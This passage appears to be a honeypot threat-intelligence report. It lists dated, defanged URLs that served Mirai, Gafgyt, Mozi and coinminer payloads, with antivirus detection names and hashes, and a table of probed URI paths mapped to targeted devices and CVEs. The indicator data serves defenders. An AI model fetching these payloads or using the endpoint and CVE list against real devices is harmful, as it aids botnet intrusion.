MAX:malware (ai score=84),
Rising:Backdoor[.]Mirai/Linux!1[.]BAF6 (CLASSIC),
GData:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]5,
AVG:ELF:Mirai-AMV [Trj]		 f2cf246ffbfe8aef85a09c50752f081041ef32c0
2020-05-24 hxxp://45[.]143[.]220[.]246/infect 2 No Data da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-05-28 hxxp://84[.]16[.]248[.]172/infect 2 No Data da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-05-01 hxxp://176[.]32[.]35[.]22/infect 1 No Data da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-04-24 hxxp://5[.]206[.]227[.]18/curl 1 No Data da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-05-02 hxxp://42[.]225[.]204[.]32:59352/Mozi[.]m 1 MicroWorld-eScan:Trojan[.]GenericKD[.]42882503,
FireEye:Trojan[.]Linux[.]Generic[.]167047,
McAfee:ELF/BackDoor[.]b,
Zillya:Trojan[.]Agent[.]Linux[.]2429,
Symantec:Trojan[.]Gen[.]MBT,
ESET-NOD32:Linux/Agent[.]HA,
TrendMicro-HouseCall:Backdoor[.]Linux[.]GAFGYT[.]AOB,
Avast:ELF:Mirai-ARH [Trj],
ClamAV:Unix[.]Malware[.]Agent-7464514-0,
Kaspersky:HEUR:Backdoor[.]Linux[.]Gafgyt[.]a,
BitDefender:Trojan[.]GenericKD[.]42882503,
NANO-Antivirus:Trojan[.]Fgt[.]guanxk,
Tencent:Linux[.]Backdoor[.]Gafgyt[.]Phra,
Ad-Aware:Trojan[.]GenericKD[.]42882503,
Emsisoft:Trojan[.]GenericKD[.]42882503 (B),
Comodo:Malware@#1byxy4joscal8,
F-Secure:Malware[.]LINUX/Agent[.]leqib,
DrWeb:Linux[.]BackDoor[.]Fgt[.]3003,
TrendMicro:Backdoor[.]Linux[.]GAFGYT[.]AOB,
Sophos:Mal/Generic-S,
Ikarus:Trojan[.]Linux[.]Gafgyt,
Cyren:ELF/Trojan[.]UOGN-5,
Jiangmin:Backdoor[.]Linux[.]dzna,
Avira:LINUX/Agent[.]leqib,
Fortinet:ELF/Gafgyt[.]A!tr[.]bdr,
Antiy-AVL:Trojan[Backdoor]/Linux[.]Gafgyt,
Arcabit:Trojan[.]Generic[.]D28E55C7,
ZoneAlarm:HEUR:Backdoor[.]Linux[.]Gafgyt[.]a,
Microsoft:Trojan:Win32/Tiggre!plock,
AhnLab-V3:Backdoor/Linux[.]Gafgyt[.]108264,
ALYac:Backdoor[.]Linux[.]Gafgyt,
MAX:malware (ai score=100),
GData:Trojan[.]GenericKD[.]42882503,
AVG:ELF:Mirai-ARH [Trj],
Qihoo-360:Linux/Backdoor[.]812		 2327be693bc11a618c380d7d3abc2382d870d48b
2020-05-03 hxxp://222[.]139[.]222[.]203:53257/Mozi[.]m 1 NG No Hash
2020-04-17 hxxp://192[.]168[.]1[.]1:8088/Mozi[.]a 1 NG No Hash
2020-05-05 hxxp://62[.]171[.]183[.]29/bins/mpsl 1 NG No Hash
2020-05-05 hxxp://89[.]32[.]41[.]93/mips 1 MicroWorld-eScan:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]5,
FireEye:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]5,
Avast:ELF:Mirai-AJJ [PUP],
ClamAV:Unix[.]Dropper[.]Mirai-7139229-0,
Kaspersky:HEUR:Backdoor[.]Linux[.]Gafgyt[.]bj,
BitDefender:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]5,
Rising:Backdoor[.]Mirai!8[.]E05B (TFE:15:sSwS8FuWBIU),
Ad-Aware:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]5,
Emsisoft:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]5 (B),
Arcabit:Trojan[.]Trojan[.]Linux[.]Gafgyt[.]5,
ZoneAlarm:HEUR:Backdoor[.]Linux[.]Gafgyt[.]bj,
AhnLab-V3:Linux/Gafgyt[.]Gen44,
BitDefenderTheta:Gen:NN[.]Mirai[.]34108,
ALYac:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]5,
MAX:malware (ai score=87),
Ikarus:Trojan[.]Linux[.]Gafgyt,
GData:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]5,
AVG:ELF:Mirai-AJJ [PUP]		 95376130931d2c64b3c22528e7a4fec2354418c1
2020-05-07 hxxp://162[.]212[.]115[.]189:52665/Mozi[.]m 1 MicroWorld-eScan:Trojan[.]GenericKD[.]42882503,
McAfee:ELF/BackDoor[.]b,
Zillya:Trojan[.]Agent[.]Linux[.]2429,
AegisLab:Trojan[.]Linux[.]Gafgyt[.]m!c,
TrendMicro-HouseCall:Backdoor[.]Linux[.]GAFGYT[.]AOB,
Avast:ELF:Mirai-ARH [Trj],
ClamAV:Unix[.]Malware[.]Agent-7464514-0,
Kaspersky:HEUR:Backdoor[.]Linux[.]Gafgyt[.]a,
BitDefender:Trojan[.]GenericKD[.]42882503,
NANO-Antivirus:Trojan[.]Fgt[.]guanxk,
ViRobot:Linux[.]S[.]Agent[.]108808,
Tencent:Linux[.]Backdoor[.]Gafgyt[.]Phra,
Ad-Aware:Trojan[.]GenericKD[.]42882503,
Sophos:Mal/Generic-S,
Comodo:Malware@#1byxy4joscal8,
F-Secure:Malware[.]LINUX/Agent[.]leqib,
DrWeb:Linux[.]BackDoor[.]Fgt[.]3003,
TrendMicro:Backdoor[.]Linux[.]GAFGYT[.]AOB,
McAfee-GW-Edition:ELF/BackDoor[.]b,
FireEye:Trojan[.]Linux[.]Generic[.]167047,
Emsisoft:Trojan[.]GenericKD[.]42882503 (B),
Cyren:ELF/Trojan[.]UOGN-5,
Jiangmin:Backdoor[.]Linux[.]dzna,
Avira:LINUX/Agent[.]leqib,
Antiy-AVL:Trojan[Backdoor]/Linux[.]Gafgyt,
Microsoft:Trojan:Win32/Tiggre!plock,
Arcabit:Trojan[.]Generic[.]D28E55C7,
ZoneAlarm:HEUR:Backdoor[.]Linux[.]Gafgyt[.]a,
GData:Trojan[.]GenericKD[.]42882503,
AhnLab-V3:Backdoor/Linux[.]Gafgyt[.]108264,
ALYac:Backdoor[.]Linux[.]Gafgyt,
MAX:malware (ai score=100),
ESET-NOD32:Linux/Agent[.]HA,
Ikarus:Trojan[.]Linux[.]Gafgyt,
Fortinet:ELF/Gafgyt[.]A!tr[.]bdr,
AVG:ELF:Mirai-ARH [Trj],
Qihoo-360:Linux/Backdoor[.]812		 2327be693bc11a618c380d7d3abc2382d870d48b
2020-05-07 hxxp://185[.]172[.]110[.]234/bins/mpsl 1 NG No Hash
2020-04-02 hxxp://irc[.]hoaxcalls[.]pw/arm7 1 NG No Hash
2020-05-09 hxxp://219[.]157[.]239[.]146:52350/Mozi[.]m 1 MicroWorld-eScan:Trojan[.]Linux[.]Generic[.]165738,
ALYac:Backdoor[.]Linux[.]Gafgyt,
Cyren:ELF/Trojan[.]WTBF-1,
Symantec:Trojan[.]Gen[.]2,
ESET-NOD32:Linux/Agent[.]HA,
TrendMicro-HouseCall:Backdoor[.]Linux[.]GAFGYT[.]ANU,
Avast:Other:Malware-gen [Trj],
ClamAV:Unix[.]Malware[.]Agent-7148704-0,
Kaspersky:HEUR:Backdoor[.]Linux[.]Gafgyt[.]a,
BitDefender:Trojan[.]Linux[.]Generic[.]165738,
NANO-Antivirus:Trojan[.]Elf32[.]Gafgyt[.]fxtfhw,
ViRobot:Linux[.]S[.]Agent[.]129280,
Ad-Aware:Trojan[.]Linux[.]Generic[.]165738,
Sophos:Mal/Generic-S,
Comodo:Malware@#2ve34ix0s65zq,
F-Secure:Malware[.]LINUX/Agent[.]nphwa,
DrWeb:Linux[.]Packed[.]687,
Zillya:Trojan[.]Agent[.]Linux[.]2151,
TrendMicro:Backdoor[.]Linux[.]GAFGYT[.]ANU,
McAfee-GW-Edition:Linux/Agent[.]f,
FireEye:Trojan[.]Linux[.]Generic[.]165738,
Emsisoft:Trojan[.]Linux[.]Generic[.]165738 (B),
Ikarus:Trojan[.]Linux[.]Agent,
Jiangmin:Backdoor[.]Linux[.]dpuu,
Avira:LINUX/Agent[.]nphwa,
Fortinet:ELF/Gafgyt[.]A!tr[.]bdr,
Antiy-AVL:Trojan[Backdoor]/Linux[.]Gafgyt,
Arcabit:Trojan[.]Linux[.]Generic[.]D2876A,
AegisLab:Trojan[.]Linux[.]Gafgyt[.]m!c,
ZoneAlarm:HEUR:Backdoor[.]Linux[.]Gafgyt[.]a,
Microsoft:Trojan:Win32/Occamy[.]C,
AhnLab-V3:Backdoor/Linux[.]Gafgyt[.]128160,
McAfee:Linux/Agent[.]f,
MAX:malware (ai score=100),
Tencent:Trojan[.]Linux[.]Agent[.]w,
GData:Trojan[.]Linux[.]Generic[.]165738,
AVG:Other:Malware-gen [Trj],
Qihoo-360:Win32/Backdoor[.]812		 1e3605f5a7c3b0ed8dd0333660e9b43431f395bd
2020-03-27 hxxp://80[.]211[.]102[.]87/mips 1 Zillya:Trojan[.]Mirai[.]Linux[.]43659,
Symantec:Trojan[.]Gen[.]MBT,
ESET-NOD32:a variant of Linux/Mirai[.]NX,
Avast:Other:Malware-gen [Trj],
ClamAV:Unix[.]Dropper[.]Mirai-7135920-0,
Kaspersky:HEUR:Backdoor[.]Linux[.]Mirai[.]h,
Comodo:Malware@#2pq4su33eh2iz,
F-Secure:Malware[.]LINUX/Mirai[.]mliti,
DrWeb:Linux[.]BackDoor[.]Fgt[.]3055,
TrendMicro:Backdoor[.]Linux[.]ZYX[.]USELVD420,
Sophos:Mal/Generic-S,
Avira:LINUX/Mirai[.]mliti,
AegisLab:Trojan[.]Linux[.]Mirai[.]K!c,
ZoneAlarm:HEUR:Backdoor[.]Linux[.]Mirai[.]h,
GData:Linux[.]Trojan[.]Agent[.]M31BDQ,
Rising:Backdoor[.]Mirai/Linux!1[.]BAF6 (CLASSIC),
Fortinet:ELF/Mirai[.]H!tr[.]bdr,
AVG:Other:Malware-gen [Trj],
Qihoo-360:Linux/Backdoor[.]428		 c29c6d9d33d3d464d8406598decb14ddfa1295a1
2020-05-10 hxxp://194[.]36[.]188[.]170/mipsel 1 NG No Hash
2020-03-18 HTTP/1[.]1rnHost: 1 NG No Hash
2020-05-11 hxxp://185[.]172[.]110[.]235/wget 1 No Data da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-05-11 hxxp://178[.]238[.]236[.]119/mips 1 NG No Hash
2020-05-13 hxxp://37[.]49[.]230[.]56/EkSgbins[.]sh 1 No Data da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-05-13 hxxp://37[.]49[.]230[.]234/bins/911[.]mips 1 DrWeb:Linux[.]Mirai[.]1288,
MicroWorld-eScan:Trojan[.]Linux[.]Mirai[.]1,
FireEye:Trojan[.]Linux[.]Mirai[.]1,
McAfee:Linux/Mirai[.]l,
Zillya:Trojan[.]Mirai[.]Linux[.]52172,
BitDefenderTheta:Gen:NN[.]Mirai[.]34108,
ESET-NOD32:a variant of Linux/Mirai[.]KU,
TrendMicro-HouseCall:Backdoor[.]Linux[.]MIRAI[.]SMMR1,
Avast:ELF:Mirai-AMO [Trj],
Kaspersky:HEUR:Backdoor[.]Linux[.]Mirai[.]b,
BitDefender:Trojan[.]Linux[.]Mirai[.]1,
Tencent:Backdoor[.]Linux[.]Mirai[.]wao,
Ad-Aware:Trojan[.]Linux[.]Mirai[.]1,
Emsisoft:Trojan[.]Linux[.]Mirai[.]1 (B),
TrendMicro:Backdoor[.]Linux[.]MIRAI[.]SMMR1,
McAfee-GW-Edition:Linux/Mirai[.]l,
Ikarus:Trojan[.]Linux[.]Mirai,
Cyren:ELF/Mirai[.]D[.]gen!Camelot,
Jiangmin:Backdoor[.]Linux[.]emka,
Fortinet:ELF/Mirai[.]KU!tr,
Antiy-AVL:Trojan[Backdoor]/Linux[.]Mirai[.]b,
Arcabit:Trojan[.]Linux[.]Mirai[.]1,
ZoneAlarm:HEUR:Backdoor[.]Linux[.]Mirai[.]b,
Avast-Mobile:ELF:Mirai-VL [Trj],
ALYac:Trojan[.]Linux[.]Mirai[.]1,
MAX:malware (ai score=88),
Rising:Backdoor[.]Mirai!8[.]E05B (TFE:14:EuFgSHfjy8C),
GData:Linux[.]Trojan[.]Mirai[.]E,
AVG:ELF:Mirai-AMO [Trj]		 cac38b6f97cecb9ced47979b722e0ae71bc41d60
2020-05-13 hxxp://192[.]236[.]161[.]170/realtek 1 No Data da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-05-14 hxxp://192[.]119[.]111[.]122/realtek 1 NG No Hash
2020-05-14 hxxp://192[.]119[.]111[.]122/huawei 1 NG No Hash
2020-05-14 hxxp://185[.]172[.]110[.]241/nope/jaws[.]sh 1 No Data da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-04-11 hxxp://146[.]71[.]79[.]230/363A3EDC10A2930DVNICE/init[.]sh 1 McAfee:Linux/CoinMiner[.]x,
Symantec:Downloader,
Avast:BV:Miner-BR [Drp],
ClamAV:Txt[.]Coinminer[.]Downloader-6811173-0,
DrWeb:Linux[.]BtcMine[.]222,
McAfee-GW-Edition:Linux/CoinMiner[.]x,
Ikarus:Trojan-Downloader[.]Linux[.]Miner,
Jiangmin:Trojan[.]GenericKD[.]bju,
AhnLab-V3:Downloader/Shell[.]ElfMiner[.]S1114,
Tencent:Heur:Trojan[.]Linux[.]Downloader[.]i,
AVG:BV:Miner-BR [Drp]		 bc5fa2abb2fd7af93442e611d43c51f7ca5f2e67
2020-05-14 hxxp://45[.]14[.]224[.]32/SBIDIOT/bins[.]sh 1 No Data da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-05-15 hxxp://192[.]236[.]176[.]143/realtek 1 No Data da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-05-16 hxxp://45[.]14[.]224[.]204/yoyobins[.]sh 1 No Data da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-05-17 hxxp://37[.]49[.]226[.]49/infect 1 No Data da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-05-18 hxxp://205[.]185[.]115[.]72/d 1 NG No Hash
2020-05-20 hxxp://185[.]225[.]19[.]209/le[.]bot[.]arm7 1 MicroWorld-eScan:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
FireEye:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
McAfee:Linux/Mirai[.]f,
BitDefenderTheta:Gen:NN[.]Mirai[.]34110,
ESET-NOD32:a variant of Linux/Mirai[.]AWB,
TrendMicro-HouseCall:Possible_MIRAI[.]SMLBO2,
Avast:ELF:Mirai-AOT [Trj],
ClamAV:Unix[.]Dropper[.]Mirai-7135925-0,
Kaspersky:HEUR:Backdoor[.]Linux[.]Mirai[.]b,
BitDefender:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
Ad-Aware:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
Emsisoft:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9 (B),
TrendMicro:Possible_MIRAI[.]SMLBO2,
McAfee-GW-Edition:Linux/Mirai[.]f,
Sophos:Linux/DDoS-CI,
Ikarus:Trojan[.]Linux[.]Mirai,
Fortinet:ELF/Mirai[.]IA!tr,
Arcabit:Trojan[.]Trojan[.]Linux[.]Gafgyt[.]9,
ZoneAlarm:HEUR:Backdoor[.]Linux[.]Mirai[.]b,
Avast-Mobile:ELF:Mirai-ATJ [Trj],
Microsoft:Trojan:Linux/Mirai[.]SP!MSR,
ALYac:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
MAX:malware (ai score=80),
Tencent:Backdoor[.]Linux[.]Mirai[.]wam,
GData:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
AVG:ELF:Mirai-AOT [Trj]		 e66b2236b73ae4400b957015397e1b670d702e74
2020-03-24 hxxp://45[.]137[.]151[.]106/ec8ce6abb3e952a85b85/init[.]sh 1 NG No Hash
2020-05-20 hxxp://37[.]49[.]226[.]165/miori[.]mips 1 NG 3cc1cb82bfe01770de2dbb484c9c7f3e556e12bd
2020-03-21 hxxp://switchnets[.]net/unstable 1 NG No Hash
2020-05-24 hxxp://45[.]95[.]168[.]136/bins[.]sh 1 No Data da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-05-24 hxxp://23[.]254[.]224[.]102/yoyobins[.]sh 1 NG No Hash
2020-05-26 hxxp://192[.]236[.]198[.]174/0xxx0xxxasdajshdsajhkgdja/Sa0aS[.]mips 1 NG 3523955fea7b8c57fbde6eb708fa82a897f77bb4
2020-05-28 hxxp://37[.]49[.]226[.]110/axisbins[.]sh 1 No Data da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-05-29 hxxp://198[.]98[.]54[.]147/d 1 NG No Hash
2020-05-29 hxxp://45[.]95[.]168[.]85/le[.]bot[.]arm7 1 MicroWorld-eScan:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
FireEye:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
Symantec:Trojan[.]Gen[.]NPE,
TrendMicro-HouseCall:Possible_MIRAI[.]SMLBO2,
Avast:ELF:Mirai-AOT [Trj],
ClamAV:Unix[.]Dropper[.]Mirai-7135925-0,
Kaspersky:HEUR:Backdoor[.]Linux[.]Mirai[.]b,
BitDefender:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
Tencent:Backdoor[.]Linux[.]Mirai[.]wam,
Ad-Aware:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
Emsisoft:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9 (B),
DrWeb:Linux[.]Mirai[.]4520,
TrendMicro:Possible_MIRAI[.]SMLBO2,
Sophos:Linux/DDoS-CI,
Avira:LINUX/Mirai[.]bdgxy,
Fortinet:ELF/Mirai[.]A!tr,
Arcabit:Trojan[.]Trojan[.]Linux[.]Gafgyt[.]9,
ZoneAlarm:HEUR:Backdoor[.]Linux[.]Mirai[.]b,
Avast-Mobile:ELF:Mirai-ATJ [Trj],
Microsoft:Trojan:Linux/Mirai[.]SP!MSR,
BitDefenderTheta:Gen:NN[.]Mirai[.]34122,
ALYac:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
MAX:malware (ai score=87),
ESET-NOD32:a variant of Linux/Mirai[.]AXD,
Ikarus:Trojan[.]Linux[.]Mirai,
GData:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
AVG:ELF:Mirai-AOT [Trj]		 32c38d7ddad417c8aef3ca457f19ae3c8ec5f337

URI PATH

URI Path Target CVE Count
No uri path - - 612979 件
/ - - 21985 件
/ctrlt/DeviceUpgrade_1 Huawei Home Device - 726 件
login[.]cgi D-Link Router - 716 件
/picsdesc[.]xml Realtek SDK CVE-2014-8361 454 件
/nice - - 442 件
sip:nm Session Initiation Protocol - 440 件
/version - - 260 件
hxxp://clientapi[.]ipip[.]net/echo[.]php Unauthorized relay - 195 件
/ws/v1/cluster/apps/new-application Apache Hadoop - 191 件
/shell - - 182 件
/console - - 159 件
/login Login Page - 158 件
/cgi-bin/test-cgi CGI - 155 件
/horde/imp/test[.]php Horde Imp - 155 件
/login/do_login Login Page - 155 件
/login[.]action Login Page - 154 件
/phpMyAdmin/scripts/setup[.]php phpMyAdmin - 154 件
/phpmyadmin/scripts/setup[.]php phpMyAdmin - 154 件
/api api - 133 件
/server-info - - 129 件
/hazelcast/rest/cluster Open-Xchange AppSuite CVE-2013-5936 124 件
/cgi CGI - 123 件
SERVER - - 119 件
/service/extdirect - - 104 件
/jars Unknown - 98 件
/jmx JMX - 89 件
hxxp://112[.]35[.]63[.]31:8088/index[.]p
hp
 - - 89 件
hxxp://112[.]35[.]66[.]7:8088/index[.]ph
p
 - - 78 件
/_ping Unknown - 76 件
hxxp://123[.]125[.]114[.]144/ Unauthorized relay - 73 件
hxxp://112[.]35[.]53[.]83:8088/index[.]p
hp
 - - 73 件
hxxp://112[.]35[.]88[.]28:8088/index[.]p
hp
 - - 67 件
/admin/assets/js/views/login[.]js FreePBX - 61 件
/manager/html Apache Tomcat Manager - 60 件
/tmpfs/auto[.]jpg IP camera - 60 件
/solr/admin/info/system - - 55 件
hxxp://163[.]172[.]88[.]110:41298/pass Unauthorized relay - 55 件
hxxp://api[.]proxychecker[.]co/ Unauthorized relay - 53 件
hxxp://112[.]124[.]42[.]80:63435/ Unauthorized relay - 50 件
[.][.]/[.][.]/proc/ proc directory - 49 件
/_search Elasticsearch - 46 件
/unix/ unix - 42 件
/setup[.]cgi - - 39 件
/v1[.]40/containers/json Docker - 35 件
/streaming/clients_live[.]php - - 34 件
/tmUnblock[.]cgi Linksys E-series - 33 件
/api/v1/targets api - 31 件
/api/v1/label/version/values api - 30 件
/sess-bin/login_session[.]cgi - - 30 件
/doLogin Unknown Unknown 29 件
hxxp://example[.]com/ Unauthorized relay - 28 件
hxxp://checkip[.]amazonaws[.]com/ Unauthorized relay - 27 件
/operator/basic[.]shtml AXIS 212 PTZ/212PTZ-V - 27 件
/\cgi-bin/login[.]cgi Crestron AirMedia AM-100 CVE-2016-5639 27 件
/\cgi-bin/get_status[.]cgi Apexis IP CAM - 27 件
/info - - 24 件
/stats - - 24 件
/db/manage/ Database - 24 件
hxxp://pv[.]sohu[.]com/cityjson Unauthorized relay - 24 件
/v1[.]16/version - - 23 件
/hudson Unknown - 23 件
/live/CPEManager/AXCampaignManager/delet
e_cpes_by_ids
 Zyxel CNM SecuManager - 22 件
/setup/eureka_info - - 20 件
/api/v1/label/goversion/values api - 20 件
/api/v1/query api - 20 件
/wls-wsat/CoordinatorPortType11 Weblogic CVE-2017-10271 19 件
/stalker_portal/c/ - - 19 件
hxxp://ip[.]sb/ Unauthorized relay - 19 件
/dana-na/auth/url_default/welcome[.]cgi Pulse/Juniper Networks SA2000 SSL VPN CVE-2019-11539/ 18 件
/index[.]asp index - 18 件
/cgi-bin/luci CGI - 17 件
/remote/login VPN Login - 17 件
/htmlV/welcomeMain[.]htm Verizon Modem Router - 17 件
/stalker_portal/c/version[.]js - - 17 件
/client_area/ Unknown Unknown 17 件
/api[.]php api - 17 件
/login[.]php Login Page - 17 件
/system_api[.]php - - 17 件
/streaming - - 17 件
/home[.]asp ASP file - 16 件
/login[.]cgi D-Link Router - 16 件
/vpn/index[.]html - - 16 件
/manager/text/list Apache Tomcat Manager - 16 件
/setup/index[.]jsp - - 14 件
/polycom/ Polycom - 13 件
/prov/ Unknown Unknown 13 件
/yealink/ yealink - 13 件
/phonecnf/ - - 13 件
/tftpphone/ Unknown Unknown 13 件
/provisioning/ cfg file- 20200626 13 件
/tftpboot/ TFTP Server CVE-2008-1611 13 件
/tftp/ TFTP Server - 13 件
/xml/ Unknown - 13 件
/phone/ - - 13 件
/phones/ - - 13 件
/phoneprov/ - - 13 件
/firmware/ Unknown Unknown 13 件
/cfg/ cfg file - 13 件
/grandstream/ grandstream - 13 件
/tftpserver/ TFTP Server - 13 件
/phonecfg/ - - 13 件
/configs/ - - 13 件
/conf/ - - 13 件
/status - - 12 件
/prv/ Unknown Unknown 12 件
/ATA/ Unknown Unknown 12 件
/ftp/ FTP - 12 件
/[.]cfg/ Hidden files - 12 件
/gs/ Ghostscript - 12 件
/cnf/ conf file - 12 件
/dvr/cmd LILIN CCTV Camera - 12 件
hxxp://hxxpheader[.]net/ Unauthorized relay - 11 件
/streaming/w67fNAtW[.]php - - 11 件
/robots[.]txt robots.txt - 9 件
/cgi-bin/webctrl[.]cgi CGI - 9 件
/ipp CUPS CVE-2015-1158 8 件
/admin-scripts[.]asp Administrator - 8 件
/TP/public/index[.]php - - 8 件
/users - - 8 件
/UD/act Eir D1000 Wireless Router - 7 件
/index[.]action Apache Struts 2 CVE-2017-5638 7 件
/install[.]php php - 6 件
/Telerik[.]Web[.]UI[.]WebResource[.]axd Telerik - 6 件
/_cat/indices Elasticsearch - 6 件
RTSP://160[.]16[.]145[.]183:554/ RTSP - 6 件
/streaming/jRvlebFoJR[.]php - - 6 件
RTSP://160[.]16[.]145[.]183:8554/ RTSP - 5 件
/versions - - 5 件
/v1/agent/self Hashicorp Consul - 5 件
rtsp:// RTSP - 5 件
/solr/ - - 5 件
RTSP://160[.]16[.]145[.]183:10554/ RTSP - 5 件
/fikker/webcache[.]fik Fikker - 5 件
/PSBlock Supermicro IPMI - 5 件
hxxp://aandetransportandrecovery[.]co[.]
uk/kloppW[.]php
 Unauthorized relay - 5 件
/adv,/cgi-bin/weblogin[.]cgi Zyxel NAS CVE-2020-9054 5 件
hxxp://ip-api[.]com/json Unauthorized relay - 5 件
/console/login/LoginForm[.]jsp - - 5 件
/_stats Elasticsearch - 5 件
rtsp://160[.]16[.]145[.]183:8554/ RTSP - 4 件
rtsp://160[.]16[.]145[.]183:554/ RTSP - 4 件
hxxp://www[.]google[.]com/ Unauthorized relay - 4 件
/login[.]html Login Page - 4 件
/photo/p/api/album[.]php QNAP QTS and Photo Station 6.0.3 - 4 件
/metrics - - 3 件
/v2/stats/self - - 3 件
/setup[.]xml - - 3 件
/_nodes Unknown Unknown 3 件
/api/v1 api - 3 件
rtsp://160[.]16[.]145[.]183:554 RTSP - 3 件
hxxp://chekfast[.]zennolab[.]com/proxy[.
]php
 Unauthorized relay - 3 件
/ws/v1/cluster Apache Hadoop - 3 件
/cgi-bin/nobody/ CGI - 3 件
/GponForm/diag_Form DASAN Network Solutions CVE-2018-10561 3 件
/upnpdev[.]xml Huawei Home Gateway(HG655m) - 3 件
/tr064dev[.]xml Huawei HG532e - 3 件
/master-status Unknown - 3 件
hxxp://5[.]188[.]210[.]101/echo[.]php Unauthorized relay - 3 件
/MyAdmin/scripts/setup[.]php Administrator - 3 件
/ftptest[.]cgi Web Camera - 3 件
/my/scripts/setup[.]php PHPMyAdmin - 3 件
/HNAP1 D-Link Router CVE-2017-3193 3 件
/sdk - - 3 件
/evox/about Nmap - 3 件
/photo/slideshow[.]php QNAP QTS and Photo Station 6.0.3 - 3 件
rtsp://160[.]16[.]145[.]183:10554/ RTSP - 2 件
/playlist[.]m3u8 HLS - 2 件
/securityRealm/user/admin/search/index - - 2 件
/manager Apache Tomcat Manager - 2 件
rtsp://160[.]16[.]145[.]183:554/12 RTSP - 2 件
rtsp://160[.]16[.]145[.]183:44554/12 RTSP - 2 件
hxxp://api[.]gxout[.]com/proxy/check[.]a
spx
 Unauthorized relay - 2 件
/UD/ Eir D1000 Wireless Router - 2 件
[.][.]/[.][.]/proc proc directory - 2 件
/nmaplowercheck1589969002 Nmap - 2 件
hxxp://work[.]a-poster[.]info:25000/ Unauthorized relay - 2 件
/nmaplowercheck1590013021 Nmap - 2 件
rtsp://160[.]16[.]145[.]183:8554 RTSP - 2 件
/nmaplowercheck1590098241 Nmap - 2 件
/ui/ Unknown Unknown 2 件
/[.]git/config Hidden files - 2 件
/0bef Unknown - 2 件
hxxp://aandetransportandrecovery[.]co[.]
uk/
 Unauthorized relay - 1 件
/search - - 1 件
/v2/_catalog Docker - 1 件
/stat - - 1 件
/h2-console H2 Console - 1 件
/ws_utc/config[.]do Oracle WebLogic Server CVE-2018-2894 1 件
hxxp://160[.]16[.]145[.]183:49155/upnp/c
ontrol/basicevent1
 Unauthorized relay - 1 件
/v1[.]39/containers/json Docker - 1 件
/ide[.]html IDE - 1 件
rtsp://160[.]16[.]145[.]183:10554 RTSP - 1 件
hxxp://www[.]proxylists[.]net/proxyjudge
[.]php
 Unauthorized relay - 1 件
/json_rpc JSON-RPC - 1 件
/board[.]cgi Vacron NVR - 1 件
/goform/webLogin Unknown Unknown 1 件
/[.]cfg Hidden files - 1 件
/esps/ Unknown Unknown 1 件
/webdav/ WebDAV - 1 件
/st/js/sencha-touch-1[.]1[.]0/sencha-tou
ch[.]js
 - - 1 件
/cgi-bin/authorize[.]asp CGI - 1 件
/js JavaScript - 1 件
/rest/tinymce/1/macro/preview Atlassian Confluence Server CVE-2019-3396 1 件
/core/CHANGELOG[.]txt Drupal - 1 件
/invoker/EJBInvokerServlet HP Product CVE-2013-4810 1 件
/cgi-bin/bfenterprise/clientregister[.]e
xe
 CGI - 1 件
/login[.]rsp Login Page - 1 件
/cgi-bin/authLogin[.]cgi CGI - 1 件
/admin/connection/ Administrator - 1 件
/solr/atom/dataimport - - 1 件
/solr/db/dataimport - - 1 件
/solr/mail/dataimport - - 1 件
/solr/solr/dataimport - - 1 件
/solr/tika/dataimport - - 1 件
/ipp/ - - 1 件
/api/status[.]json api - 1 件
sip:160[.]16[.]145[.]183 Session Initiation Protocol - 1 件
/manager_dev_ping_t[.]gch Apache Tomcat Manager - 1 件
/ajax/api/content_infraction/getIndexabl
eContent
 - - 1 件
hxxp://www[.]baidu[.]com/ Unauthorized relay - 1 件
/containers/json Docker - 1 件
/systemInfo - - 1 件
hxxp://www[.]knowops[.]com/cgi-bin/texte
nv[.]pl
 Unauthorized relay - 1 件
/goform/AdvSetDns Unicorn Router WB-3300NR - 1 件
/dnscfg[.]cgi D-Link DSL - 1 件
/ddnsmngr[.]cmd D-Link DSL-2640B CVE-2013-5223 1 件
/Forms/dns_1 D-Link DSL-2680 CVE-2019-19225 1 件
/cgi-bin/nobody/Search[.]cgi CGI - 1 件
/cgi-bin/ CGI - 1 件
/vod_installer/[.]env env file - 1 件
/soap[.]cgi - - 1 件
/script - - 1 件
/axis2/ Apache Axis2 - 1 件
/exstatic/json/loginAction_login[.]actio
n
 Unknown Unknown 1 件
/seeyon/htmlofficeservlet - - 1 件
/admin[.]php Administrator - 1 件
/Lists/admin[.]php Administrator - 1 件
/nifi-api/system-diagnostics Apache NiFi - 1 件
/phpmyadmin phpMyAdmin - 1 件
/config - - 1 件

